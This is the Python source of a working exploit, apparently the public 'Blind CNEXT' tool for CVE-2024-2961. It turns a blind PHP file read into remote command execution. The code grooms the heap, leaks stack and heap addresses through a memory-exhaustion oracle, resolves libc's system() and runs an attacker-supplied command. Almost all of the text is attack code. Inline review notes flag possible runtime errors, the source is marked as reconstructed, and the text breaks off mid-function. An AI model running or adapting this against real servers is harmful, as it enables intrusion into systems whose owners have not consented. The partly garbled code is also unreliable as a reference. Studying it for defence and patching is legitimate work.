# README.md
# Rendering markdown...
#!/usr/bin/env python3
#
# Blind CNEXT: Blind PHP file read to RCE (CVE-2024-2961)
# Date: 2024-09-30
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload
# and how to verify that the blowup happened, i.e. that PHP went OOM.
#
# TODO
#
# If you feel like improving the exploit, please submit a PR. Here are some improvement
# ideas:
#
# - Automatic configuration of the oracle
# - Handle multithreading
# - Handle non-PIE ELFs
# - Properly handle ELF endianness
# - Use the libc's Build ID to find system faster
# - Verify that we properly dump addresses that contain newline characters
#
# DEBUGGING
#
# This exploit is complex, and I may have made mistakes. Although it is built not to
# crash, it is a binary exploit, so it might anyway.
#
# If you encounter any issue, please provide the following information:
#
# - The full output of the exploit, with the `-d` flag
# - The exact code of the PHP page that is being attacked, or better, a docker image
#
# Unless I see both, issues will be automatically closed.
#
#
# TECHNICAL
#
# The exploit is a blind file read to RCE in PHP, using the iconv filter. Its behavior
# is documented in the following blog posts:
#
# https://www.ambionics.io/blog/iconv-cve-2024-2961-p1
# https://www.ambionics.io/blog/iconv-cve-2024-2961-p3
#
from __future__ import annotations
import base64
import itertools
import zlib
from collections import Counter
from dataclasses import dataclass, field
from typing import NoReturn
from requests.exceptions import ConnectionError, ChunkedEncodingError
import time
from rich.align import Align
from rich.rule import Rule
from ten import *
import struct
set_message_formatter("Icon")
# sys.path.append(os.path.join(os.path.dirname(__file__), "php_filter_chains_oracle_exploit"))
from php_filter_chains_oracle_exploit.filters_chain_oracle.core.bruteforcer import (
Bruteforcer,
)
# Biggest doubly-compressed payload accepted in the data: URL (see _data_to_resource)
MAX_COMPRESSED_LEN = 1500
# Upper bound on the php://filter path length
MAX_PATH_LEN = 9000
from tenlib import logging
# -- Constants
# zend_mm allocates 2 MB chunks (used to mask pointers down to a chunk base)
HEAP_SIZE = 2 * 1024 * 1024
# UTF-8 sequence whose conversion to ISO-2022-CN-EXT triggers the one-byte
# overflow of CVE-2024-2961
BUG = "劄".encode("utf-8")
# Starting guess for the number of 0x400 chunks required for page alignment
MIN_NB_400_CHUNKS = 100
CS = 0x400 # bin=23, chunks=8, pages=2
# Filler chunks of size 0x400 and 0x30 used to groom the heap
ZERO_CHUNK = b"0" * CS
ZERO_CHUNK_30 = b"0" * 0x30
# 85 * 5: presumably five pages' worth of 0x30 allocations — TODO confirm
NB_30_CHUNKS = 85 * 5
NB_30_CHUNKS_2 = NB_30_CHUNKS + 85 * 5
PAGE_SIZE = 0x1000
# How far (in pages) the PHP ELF header may sit below zval_ptr_dtor
PHP_ELF_MIN_PAGE_DISTANCE = 1500
PHP_ELF_MAX_PAGE_DISTANCE = 3000
class Remote:
    """A helper class to send the payload and check whether a blowup happened.

    The logic of the exploit is always the same, but the exploit needs to know how to
    send the payload and how to check if a blowup happened. A blowup is when PHP tries
    to allocate too much memory and returns an error such as:

        Allowed memory size of 134217728 bytes exhausted

    The code here serves as an example that attacks a page that looks like:

    ```php
    <?php
    ini_set('display_errors', 1);
    file_get_contents($_POST['file']);
    ```

    Tweak it to fit your target, and start the exploit.
    """

    def __init__(self, url: str) -> None:
        self.url = url
        # NOTE(review): Session comes from ten's star import — presumably a
        # requests-compatible session; confirm.
        self.session = Session()

    def oracle(self, path: str) -> bool:
        """Sends given `path` to the HTTP server. Returns whether a blowup happened."""
        # Debugging aid: keep a copy of the last payload sent
        write("/tmp/payload", path)
        try:
            response = self.session.post(self.url, data={"file": path})
        except ConnectionError:
            raise RuntimeError("Connection error, server crashed or timeout!")
        # The target has display_errors on, so the OOM shows up in the body
        return response.contains("Allowed memory size of")
@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("alignment", "Number of 0x400 chunks to spawn so that we overflow into the penultimate one of a page.")
@arg("brig_inp", "Address of the brig_inp variable on the stack.")
@arg("heap", "Address of the zend_mm_heap object.")
@arg("php_elf", "Address of the PHP ELF in memory.")
@arg("zval_ptr_dtor", "Address of `zval_ptr_dtor` in memory.")
@arg("libc_elf", "Address of the libc ELF in memory.")
@arg("system", "Address of the `system` function in the libc.")
@arg("malloc", "Address of the `malloc` function in the libc.")
@arg("realloc", "Address of the `realloc` function in the libc.")
@arg("debug", "Display DEBUG log messages in the CLI.")
@dataclass
class Exploit:
    """Blind CNEXT exploit: RCE using a blind file read primitive in PHP, using CVE-2024-2961.

    cfreal @ LEXFO/AMBIONICS
    """

    # Mandatory CLI arguments
    url: str
    command: str
    # Optional arguments: each value below can be supplied on the CLI to skip
    # the corresponding discovery step on a later run. Addresses are given as
    # hex strings and converted to ints by _maybe_convert_arguments().
    alignment: int | None = None
    brig_inp: str | None = None
    heap: str | None = None
    php_elf: str | None = None
    zval_ptr_dtor: str | None = None
    libc_elf: str | None = None
    system: str | None = None
    malloc: str | None = None
    realloc: str | None = None
    sleep: int = 1
    debug: bool = False
BLOW_UP_UTF32 = "convert.iconv.L1.UCS-4"
BLOW_UP_INFINITY = [BLOW_UP_UTF32] * 15
# TODO Is it really needed now?
FILTER_USAGE = (
# Base filters
Counter(
{
"zlib.inflate": 3,
"dechunk": 5,
"convert.iconv.L1.L1": 2,
"convert.iconv.UTF-8.ISO-2022-CN-EXT": 1,
"zlib.deflate": 1,
"convert.base64-encode": 1,
}
)
# Character selection
+ Counter(
{
# "convert.base64-decode": 70,
# "convert.base64-encode": 70,
"convert.iconv.UTF8.CSISO2022KR": 42,
"convert.iconv.JS.UNICODE": 14,
"convert.iconv.L4.UCS2": 14,
"convert.iconv.UTF-16LE.UTF-16BE": 8,
"convert.iconv.UCS-4LE.UCS-4": 8,
"convert.iconv.L1.UTF7": 6,
}
)
# Other script
+ Counter(
{
"dechunk": 1,
"convert.iconv.L1.UCS-4": 15,
"convert.iconv.437.CP930": 6,
"convert.quoted-printable-encode": 5,
"convert.iconv..UTF7": 5,
"convert.base64-decode": 5,
"convert.base64-encode": 6,
"string.tolower": 2,
"convert.iconv.CSISO5427CYRILLIC.855": 1,
"convert.iconv.CP1390.CSIBM932": 5, # was 1, bumped to 5
"string.rot13": 2,
"convert.iconv.CP285.CP280": 1,
"string.toupper": 1,
"convert.iconv.CP273.CP1122": 1,
"convert.iconv.500.1026": 1,
"convert.iconv.UTF8.IBM1140": 1,
"convert.iconv.CSUNICODE.UCS-2BE": 1,
"convert.iconv.UTF8.CP930": 1,
}
)
)
# FILTER_USAGE = Counter()
# Oracle tests to determine if the base64 digit is what we expect
FAST_PATH = {
"f": [
(False, ["convert.iconv.CP1390.CSIBM932"] * 5),
(False, []),
],
"g": [
(False, ["convert.iconv.CP1390.CSIBM932"]),
(True, []),
],
"A": [
(
False,
[
"string.tolower",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
],
),
(
True,
[
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
],
),
],
"B": [
(False, ["string.tolower", "convert.iconv.CP1390.CSIBM932"]),
(
True,
[
"string.tolower",
"convert.iconv.CP1390.CSIBM932",
"convert.iconv.CP1390.CSIBM932",
],
),
(True, ["convert.iconv.CP1390.CSIBM932"]),
],
}
def __post_init__(self) -> None:
    """Creates the HTTP wrapper, the exploit logger, and the info cache."""
    self.info = {}
    self.logger = logger("EXPLOIT")
    self.remote = Remote(self.url)
#
# Building and sending payload
#
def _get_response(self, filters: list[str], resource: str) -> Response:
    # NOTE(review): Remote.oracle() returns a bool, so `response.content`
    # below would raise at runtime; this helper looks dead or outdated —
    # the exploit uses oracle() instead. Confirm before relying on it.
    path = self._build_filter_payload(filters, resource)
    response = self.remote.oracle(path)
    # NOTE(review): `log` is not defined in this file; presumably exported
    # by ten's star import — verify.
    log.trace(
        f"Sending {len(path):#x} payload results in a response of {len(response.content)} bytes"
    )
    return response
def oracle(self, filters: list[str], resource: str) -> bool:
    """Returns true if the expansion happened, false otherwise."""
    payload = self._build_filter_payload(filters, resource)
    blowup = self.remote.oracle(payload)
    self.logger.trace(f"Sending payload of size {len(payload)} results in {blowup=}")
    return blowup
def _build_filter_payload(self, filters: list[str], resource: str) -> str:
    """Assembles the php://filter path: the read chain, the heap-balancing
    write chain, and the resource to read.
    """
    return (
        "php://filter/read=" + "|".join(filters)
        + "/write=" + self._compute_write(filters)
        + f"/resource={resource}"
    )
@classmethod
def _compute_write(cls, filters: list[str]) -> str:
    """To make sure that the heap does not change too much, we add dummy filters so
    that PHP creates the associated structures. They do not impact our exploit, as
    they are write filters. However, they will be called when the stream is finally
    freed, at the end of the execution. We thus convert any funky charset to latin1,
    to make sure PHP does not report errors. This also makes sure that the length of
    the path is always the same.

    Although this is very helpful, this is not perfect. The order in which the
    filters are created matters as well. However, we cannot control this perfectly.
    """
    used_counts = Counter(filters)
    padding: list[str] = []
    for name, required in cls.FILTER_USAGE.items():
        used = used_counts.get(name, 0)
        if name.startswith("convert.iconv."):
            # Neutralize the charsets (keep the name length) so the write
            # pass converts latin1 to latin1 and never errors out
            _, _, src, dst = name.split(".")
            if len(src) >= 2:
                src = "L1".ljust(len(src), " ")
            if len(dst) >= 2:
                dst = "L1".ljust(len(dst), " ")
            name = f"convert.iconv.{src}.{dst}"
        if used < required:
            padding += [name] * (required - used)
    return "|".join(padding)
#
# Exploit logic
#
def find_chunk_alignment(self) -> int:
    """Determines the required number of 0x400 chunks to overflow into the
    penultimate one, yielding a A->B->C' chain with C overflowing into the next
    page.
    """
    assert self.alignment is None
    # Eight attempts should suffice in theory; a few extra cost little
    candidates = range(MIN_NB_400_CHUNKS, MIN_NB_400_CHUNKS + 8)
    for i in track(candidates, "Looking for chunk alignment"):
        if self._try_big_chunks_alignment(i):
            break
    else:
        # TODO CHECK IF VULNERABLE
        failure("Unable to find heap alignment; is the target vulnerable?")
    msg_success(f"Found alignment for [i]0x400[/] chunks: {i} {option_help('-a')}")
    self.alignment = i
def _try_big_chunks_alignment(self, alignment: int) -> bool:
    """Probes whether allocating `alignment` 0x400 chunks yields the wanted
    page alignment; returns True if the blowup oracle fired, i.e. the
    overflow landed where expected and reached the expansion chain.
    """
    # After the overflow, PHP will allocate a chunk twice as big to store the iconv'
    # ed buffer. Since there was a one byte overflow, the byte at offset 0x100 in
    # the new out_buf (of size 0x200) will keep its value. If this value is 0x0A, it
    # will break the logic of the code (the `dechunk` that comes right after will
    # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
    # that will be the head of the FL.
    step1_800 = [b"0" * CS * 2]
    step1_400 = [ZERO_CHUNK] * alignment
    step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS
    step1 = self.build_conserved_chunks(step1_800 + step1_400 + step1_30, step=1)
    # Chunk holding the fake pointer, wrapped as chunked data so it survives
    # the dechunk passes (see dump_3 for the commented version of this setup)
    PTR_CHUNK = bytearray(ZERO_CHUNK)
    put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")
    step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
    step2 = self.build_conserved_chunks(step2, step=2)
    # Overflow step
    step3_overflow = bytearray(b"0" * CS)
    put(step3_overflow, -len(BUG), BUG)
    put(step3_overflow, -len(BUG) - 3, b"1e-")
    tapis = bytearray(b"T" * CS)
    put(tapis, -0x48 + 0x30 - 5, b"\na\nff" + p64(0) + b"\nAAABBBB" + p64(0))
    end_chunk = bytearray(b"E" * CS)
    put(end_chunk, 0, b"\nX\n")
    step3 = (
        [step3_overflow]
        + [b"0"]
        + [ZERO_CHUNK] * 2
        + [tapis]
        + [end_chunk]
        + [b"3" * 0x30] * (NB_30_CHUNKS_2)
    )
    step3 = self.build_conserved_chunks(step3, step=4)
    pages = b"" + step1 + step2 + step3
    resource = self._data_to_resource(pages)
    base_filters = (
        Filters.base(3)
        # Step 5: Remove data if possible
        + [
            "dechunk",
            "dechunk",
            "dechunk",
        ]
        + self.BLOW_UP_INFINITY
    )
    return self.oracle(base_filters, resource)
def dump_memory(self, address: int, size: int, message: str | None = None) -> bytes:
    """Dumps `size` bytes of memory at `address`, 3 bytes (one base64
    quartet) at a time. `message`, if given, is formatted with the address
    and size and used as a progress-bar label.
    """
    total = b""
    if message:
        message = message.format(address=address, size=size)
        generator = lambda: track(range(0, size, 3), message)
    else:
        generator = lambda: range(0, size, 3)
    for p in generator():
        hope = self.dump_3(address + p, nb_bytes=size - p)
        # NOTE(review): stdlib base64.decode() takes file objects, not a
        # string — presumably `base64` here is shadowed by ten's star import
        # with a module whose decode(str) returns bytes; confirm.
        total += base64.decode(hope)
    # print(hexdump(total, total=False))
    return total
def expect_memory(self, address: int, expected: bytes) -> bool:
    """Returns true if the memory at `address` matches the `expected` bytes,
    comparing one 3-byte group at a time and bailing out on the first
    mismatch.
    """
    offset = 0
    while offset < len(expected):
        try:
            self.dump_3(address + offset, expected=expected[offset : offset + 3])
        except UnexpectedBytesException:
            return False
        offset += 3
    return True
def _maybe_convert_arguments(self) -> None:
    """Converts hex-string CLI addresses into integers, leaving unset ones as None."""
    address_attrs = (
        "brig_inp", "heap", "zval_ptr_dtor", "php_elf",
        "libc_elf", "system", "malloc", "realloc",
    )
    for name in address_attrs:
        raw = getattr(self, name)
        if raw is not None:
            setattr(self, name, unhex(raw))
def run(self) -> None:
    """Entry point: runs every discovery step that was not short-circuited by
    a CLI argument, then executes the command.

    NOTE(review): the nesting below was reconstructed from a
    whitespace-mangled source — verify against the upstream exploit.
    """
    if self.debug:
        logging.set_cli_level("DEBUG")
    # CLI addresses come in as hex strings; convert them to ints first
    self._maybe_convert_arguments()
    got_final_params = self.heap and self.system and self.malloc and self.realloc
    # We need to find out at least one parameter before we can execute code
    if not got_final_params:
        # Do we have everything we need to perform arbitrary reads?
        if not self.alignment or not self.brig_inp:
            msg_print(Rule("READ PRIMITIVE"))
            if not self.alignment:
                self.find_chunk_alignment()
            if not self.brig_inp:
                self.leak_stack_address()
        # Do we have the heap? If we do, do we need to find the PHP ELF ?
        if not self.heap or not (self.system or self.libc_elf or self.php_elf or self.zval_ptr_dtor):
            msg_print(Rule("HEAP"))
            if not self.heap:
                self.find_heap_address()
            if not self.zval_ptr_dtor:
                self.find_zval_ptr_dtor()
        # Do we have the PHP ELF? If we don't, do we need it?
        if not (self.php_elf or self.libc_elf or self.system):
            msg_print(Rule("PHP ELF"))
            self.find_php_elf()
        address = self.find_some_libc_function()
        if not self.libc_elf:
            msg_print(Rule("LIBC ELF"))
            self.find_libc_elf(address)
        self.find_libc_functions()
    msg_print(Rule("CODE EXECUTION"))
    self.execute()
def find_some_libc_function(self) -> int:
    """Resolves, through the PHP binary's dynamic segments (STRTAB/SYMTAB/
    JMPREL), the address of some libc function to anchor the libc scan.
    """
    dumper = ELFDumper(self, self.php_elf)
    dumper.get_dynamic_section()
    dumper.get_dynamic_segments("STRTAB", "SYMTAB", "JMPREL")
    return dumper.find_some_libc_function()
def find_libc_elf(self, address: int):
    """Finds the address of the libc ELF in memory from a function it contains,
    by scanning pages downwards for the ELF magic.
    """
    assert self.libc_elf is None
    base = self._find_elf_header(address, 0, PHP_ELF_MAX_PAGE_DISTANCE)
    msg_success(f"Found [i]libc[/] ELF at {addr(base)} {option_help('-l')}")
    self.libc_elf = base
def find_libc_functions(self) -> None:
    """Resolves `system`, `malloc` and `realloc` in the libc through its GNU
    hash table, and stores them on the instance.
    """
    assert self.system is None
    dumper = ELFDumper(self, self.libc_elf)
    dumper.setup_gnu_hash()
    for name in ("system", "malloc", "realloc"):
        try:
            offset = dumper.find_symbol_from_hash(name)
        except ValueError as exc:
            failure(str(exc))
        resolved = offset + dumper.base
        msg_success(f"Found [i]{name}@libc[/] at address {addr(resolved)} {option_help('-' + name[0])}")
        setattr(self, name, resolved)
def russian_doll(self, payload: bytes, *sizes) -> bytes:
    """Returns a payload that, when successively dechunked, has its size
    changed through `sizes`; 0 stands for "current size + 8" and a negative
    value for "current size + |value|". The result is finally compressed.
    """
    wrapped = payload
    for target in sizes:
        if target == 0:
            target = len(wrapped) + 8
        elif target < 0:
            target = len(wrapped) - target
        wrapped = chunked_chunk(wrapped, target)
    return compressed_bucket(wrapped)
def _data_to_resource(self, data: bytes) -> str:
    """Converts the given bytes to a `data://` url. Compresses the input twice."""
    compressed = compress(compress(data))
    if len(compressed) > MAX_COMPRESSED_LEN:
        failure(f"Resource too big: {len(compressed)} > {MAX_COMPRESSED_LEN}")
    # The resource will be B64-decoded into a zend_string; pad it so the
    # resulting zend_string never lands in the 0x400 bin we are grooming.
    encoded = b64(compressed.ljust(0x400, b"\x00")).decode()
    return f"data:text/plain;base64,{encoded}"
def ptr_bucket(self, *ptrs, size: int, strip: int = 0) -> bytes:
    """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
    raw = b"".join(p64(ptr) for ptr in ptrs)
    if strip:
        raw = raw[:-strip]
    if size is not None:
        assert len(raw) == size, f"{len(raw):#x} != {size=:#x}"
    return self.russian_doll(qpe(raw), 0, 0, 0)
def leak_stack_address(self):
    """Overwrites a buffer that we control with a php_stream_bucket structure and
    uses it to leak the address of the stack.

    The general idea is to displace the last 0x400 chunk of a page, allocate it,
    and then allocate buckets in the page right after. Buckets get "imprinted" into
    the chunk, and we can then extract the pointers.

    A naive implementation, although very small, easy to understand, and classy, may
    yield crashes in 1/8 cases. If we overflow from the penultimate 0x400 chunk, we
    overwrite a pointer to NULL, and the upcoming allocation crashes. We can avoid
    this by first setting up the freelist (ensuring there are enough chunks), then
    doing the process. It greatly complexifies the exploit, because now we need to
    allocate lots chunks of size 0x30 right after we setup the 0x400 FL (step1), but
    then free them all before we overflow and displace the chunk, so that we can
    finally reallocate them, and have them be imprinted into the chunk. It's all a
    matter of doing things in order: we want to setup our heap, then clear it, and
    then imprint the buckets. The "naive" payload is twice as big (2000 against
    1000) but it avoids crashes. We're doing web stuff, we don't want crashes.
    """
    assert self.brig_inp is None
    # After the overflow, PHP will allocate a chunk twice as big to store the iconv'
    # ed buffer. Since there was a one byte overflow, the byte at offset 0x100 in
    # the new out_buf (of size 0x200) will keep its value. If this value is 0x0A, it
    # will break the logic of the code (the `dechunk` that comes right after will
    # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
    # that will be the head of the FL.
    step1_800 = [b"0" * CS * 2]
    step1_400 = [ZERO_CHUNK] * self.alignment
    step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS
    step1 = self.build_conserved_chunks(step1_800 + step1_400 + step1_30, step=1)
    # Chunk carrying the fake next-pointer, stored as chunked data at offset
    # 0x48 - 0x10 so it lands at C+0x48 after the overflow
    PTR_CHUNK = bytearray(ZERO_CHUNK)
    put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")
    step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
    step2 = self.build_conserved_chunks(step2, step=2)
    # Overflow step
    step3_overflow = bytearray(b"0" * CS)
    put(step3_overflow, -len(BUG), BUG)
    put(step3_overflow, -len(BUG) - 3, b"1b-")
    tapis = bytearray(b"T" * CS)
    put(tapis, -0x48 + 0x30 - 1, b"\n")
    put(tapis, -0x48 + 0x30, p64(0))
    end_chunk = bytearray(b"E" * CS)
    put(end_chunk, 3, b"\n")
    step3 = (
        [step3_overflow]
        + [b"0"]
        + [ZERO_CHUNK] * 2
        + [tapis]
        + [end_chunk]
        # protect misplaced chunk from being used
        + [ZERO_CHUNK] * 2
        + [b"3" * 0x30] * (NB_30_CHUNKS_2)
    )
    step3 = self.build_conserved_chunks(step3, step=4)
    pages = b"" + step1 + step2 + step3
    resource = self._data_to_resource(pages)
    base_filters = Filters.base(3) + [
        "dechunk",
        "convert.base64-encode",
    ]
    full_dump = ""
    # (recomputed; harmless duplicate of the call above)
    resource = self._data_to_resource(pages)
    # Base64 digits 21..27 cover the interesting 6 bytes of the stack pointer
    # (the 0x7f and NULL high bytes are reconstructed below)
    wanted_digits = range(21, 28)
    for i in track(
        wanted_digits,
        "Extracting stack pointer",
    ):
        # Build a list of filters that puts the character we're interested in in
        # front
        quartet, digit = divmod(i, 4)
        quartet_filters = (Filters.REMOVE_EQUALS + Filters.DITCH_4) * quartet
        digit_filters = Filters.QUARTET_DIGITS[digit] + quartet_filters[1:]
        digit_filters = base_filters + digit_filters
        bruteforcer = LinkedBruteforcer(self, digit_filters, resource)
        for digit, _ in bruteforcer.bruteforce():
            full_dump += digit
            break
        else:
            failure("Unable to find character")
    # Prepend a dummy digit so the dump decodes on a byte boundary, then
    # rebuild the 8-byte pointer assuming a 0x00007f.. userland address
    pointer_part = base64.decode("A" + full_dump)[1:]
    brig_inp = u64(pointer_part + b"\x7f\x00\x00")
    brig_inp = brig_inp + 0x10
    msg_success(f"Got (stack) address of [i]brig_inp[/]: {addr(brig_inp)} {option_help('-b')}")
    self.brig_inp = brig_inp
def _build_bucket(self, address: int, size: int) -> bytes:
    """Builds a fake php_stream_bucket whose buffer has size `size` and
    points to the given `address`.
    """
    fields = [
        0x00,  # next
        0x00,  # prev
        self.brig_inp,  # brigade
        address,  # buf
        size,  # len
        0x10_0000_00_00,  # refcount hole is_persistent own_buf
    ]
    return b"".join(p64(field) for field in fields)
def find_heap_address(self) -> None:
    """Reads the stack to extract a pointer to a bucket, and then leaks the
    address of the zend_mm_heap object stored at the base of its chunk.
    """
    assert self.heap is None
    md = MemoryDumper(self, 0)
    (bucket,) = md.unpack(
        self.brig_inp - 0x10, "<Q", message="Leaking bucket address from [i]brig_inp[/]"
    )
    msg_info(f"Leaked bucket address: {addr(bucket)}")
    if bucket == 0:
        failure("Cannot leak heap address: bucket is NULL")
    # zend_mm chunks are 2MB-aligned: mask the pointer down to its chunk base
    chunk = bucket & ~(0x200000 - 1)
    (heap,) = md.unpack(
        chunk, "<Q", message="Leaking [i]zend_mm_heap[/] from heap chunk"
    )
    msg_success(f"Leaked [i]zend_mm_heap[/]: {addr(heap)} {option_help('-H')}")
    self.heap = heap
def _try_fast_path(self, filters: list[str], resource: str, expected_digit: str) -> None | NoReturn:
    """Uses the fast_path tests to determine if the digit is `expected_digit`;
    returns on a hit, raises UnexpectedBytesException on a miss.
    """
    for keep_if_blow, extra_filters in self.FAST_PATH[expected_digit]:
        probe = filters + extra_filters + ["dechunk"] + self.BLOW_UP_INFINITY
        if self.oracle(probe, resource) != keep_if_blow:
            self.logger.trace(f"Fast path missed for digit {expected_digit}")
            raise UnexpectedBytesException()
    self.logger.trace(f"Fast path hit for digit {expected_digit}")
def dump_3(self, address: int, expected: bytes | None = None, nb_bytes: int = 3) -> str:
    """Dumps 3 bytes (4 base64 digits) from `address`.

    Returns the base64 quartet, '='-padded to 4 digits. If `expected` is
    given, raises UnexpectedBytesException as soon as the leaked digits
    diverge from it.
    """
    # In step 1, we allocate lots of 0x400 chunks to setup the heap, and then right
    # after we allocate 0x30 chunks. The latter will stay, while the former will be
    # removed on the next step.
    # After the overflow, PHP will allocate a chunk twice as big to store the iconv'
    # ed buffer. Since there was a one byte overflow, the byte at offset 0x400 in
    # the new out_buf (of size 0x800) will keep its value. If this value is 0x0A, it
    # will break the logic of the code (the `dechunk` that comes right after will
    # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
    # that will be the head of the FL.
    step1_800 = [b"0" * CS * 2]
    step1_400 = [ZERO_CHUNK] * self.alignment
    step1 = self.build_conserved_chunks(step1_800 + step1_400, step=1)
    step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS
    step1_30 = self.build_conserved_chunks(step1_30, dechunks=2)
    step1 += step1_30
    # In step 2, we put a NULL pointer in the last chunk of the page, and then we
    # reverse the free list for 3 elements A B C. The 0x30 chunks do not move.
    # We make the chunk that contains the fake pointer a doubly-chunked chunk, so
    # that we don't break the dechunk chain
    PTR_CHUNK = bytearray(ZERO_CHUNK)
    put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")
    step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
    step2 = self.build_conserved_chunks(step2, step=2)
    # In step 3, we overflow from A into B to change its next pointer to C+48h.
    step3_overflow = bytearray(ZERO_CHUNK)
    put(step3_overflow, -len(BUG), BUG)
    put(step3_overflow, -len(BUG) - 4, b"1b-")
    step3 = [step3_overflow, b"0"]
    step3 = self.build_conserved_chunks(step3, step=3)
    # In step 4, we overwrite a bucket
    BUCKET = self._build_bucket(address, 3)
    # TODO for loop this
    # TODO properly implemented?
    # The chunked-encoding prefix must account for every newline byte that
    # happens to appear in the fake bucket (i.e. in the target address)
    newlines = BUCKET.count(b"\x0a")
    match newlines:
        case 0:
            prefix = b"ffff-"
        case 1:
            prefix = b"5\nffff-\nffff-"
        case 2:
            prefix = b"d\n5\nffff-\nffff-\nffff-"
        case _:
            msg_debug("Leaking addresses that contain more than 2 newlines is DOABLE, just not implemented yet")
            failure("Cannot leak address: contains too many newlines")
    dechunks = ["dechunk"] * (newlines + 1)
    # Every chunk created here will preceed the data we want to leak. We need to
    # make it dechunkable. If addresses didn't contain newlines, it would be easy
    # enough.
    step5_overwrite_bucket = bytearray(ZERO_CHUNK)
    put(step5_overwrite_bucket, -0x48, BUCKET)
    put(step5_overwrite_bucket, -0x48-len(prefix), prefix)
    # Get rid of the last bytes: we don't want to overwrite the second bucket of
    # the page
    step5_overwrite_bucket = step5_overwrite_bucket[:-0x18]
    # Final chunk: directly preceeds the leaked data
    final = bytearray(ZERO_CHUNK)
    put(final, -1, b"\n")
    step5 = [ZERO_CHUNK, ZERO_CHUNK, step5_overwrite_bucket, ZERO_CHUNK, ZERO_CHUNK, ZERO_CHUNK, final]
    step5 = [qpe(chunked_chunk(chunk, CS*2)) for chunk in step5]
    step5 = self.build_conserved_chunks(step5, step=3)
    step4 = b""
    # Merge pages
    pages = step5 + step4 + step1 + step2 + step3
    resource = self._data_to_resource(pages)
    base_filters = Filters.base(2) + [
        "convert.iconv.L1.L1",
        # Step 4: Overwrite buffer
        "convert.quoted-printable-decode",
        "dechunk",
        "convert.iconv.L1.L1",
        # Step 5: Remove the stuff preceding the leaked data
    ] + dechunks + [
        # Step 6: Inprint the data
        # "zlib.deflate",
        # "zlib.inflate",
        "convert.base64-encode",
    ]
    # The four (or less, if nb_bytes if lower) characters that we need to dump
    quartet = ""
    # If some characters in the B64 quartet are expected, we can check if a fast
    # path exists for them, and hit it instead of bruteforcing the digit and then
    # comparing it to the expected value.
    # b64_expected represents every B64 digit that is expected. We cannot
    # naively convert to B64 because some bytes may be incomplete.
    #
    # Quick example: we expect b"Z", so we b64-encode and get "Wg==". In this, W
    # encodes the first 6 bits of Z, and g the last 2. We cannot naively compare g
    # with the second character of the leak, because the latter also encodes the 4
    # first bits of the second byte of memory.
    if expected:
        b64_expected = b64(expected).decode()
        # Keep only the digits that `expected` fully determines
        match len(expected):
            case 1:
                b64_expected = b64_expected[:1]
            case 2:
                b64_expected = b64_expected[:2]
            case 3:
                pass
    else:
        b64_expected = ""
    for i, get_digit in enumerate(Filters.QUARTET_DIGITS):
        if len(quartet) > nb_bytes:
            break
        filters = base_filters + get_digit
        if i < len(b64_expected) and b64_expected[i] in self.FAST_PATH:
            base64_digit = b64_expected[i]
            self._try_fast_path(filters, resource, base64_digit)
            quartet += base64_digit
            continue
        bruteforcer = LinkedBruteforcer(self, filters, resource)
        for digit, _ in bruteforcer.bruteforce():
            break
        else:
            failure("Could not find the character")
        quartet += digit
        # We compare the size of a B64 to a normal byte array, but the comparison
        # still holds.
        if expected:
            self._check_quartet_chunk_is_expected(quartet, expected)
            if len(quartet) > len(expected):
                break
    self.logger.trace(f"Got quartet {quartet} for address {address:#x}")
    return quartet.ljust(4, "=")
def _check_quartet_chunk_is_expected(
    self, quartet: str, expected: bytes
) -> None | NoReturn:
    """Checks that the dumped quartet matches what is expected; raises
    UnexpectedBytesException on mismatch.
    """
    digits = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    def b64_number(data: str) -> int:
        # Value of up to 4 base64 digits, left-aligned on 24 bits
        return sum(
            digits.index(digit) << (6 * (3 - i)) for i, digit in enumerate(data)
        )

    def number(data: bytes) -> int:
        # Value of up to 3 bytes, left-aligned on 24 bits
        return sum(byte << (8 * (2 - i)) for i, byte in enumerate(data))

    # Only compare the bits that BOTH sides fully determine (6 bits per
    # base64 digit vs 8 bits per expected byte)
    mask = 24 - min(len(expected) * 8, len(quartet) * 6)
    mask = (1 << 24) - 1 - ((1 << mask) - 1)
    number_quartets = b64_number(quartet) & mask
    number_expected = number(expected) & mask
    # print(f"{number_quartets=:24b}")
    # print(f"{number_expected=:24b}")
    # print(f"          {mask=:24b}")
    if number_quartets != number_expected:
        self.logger.debug(
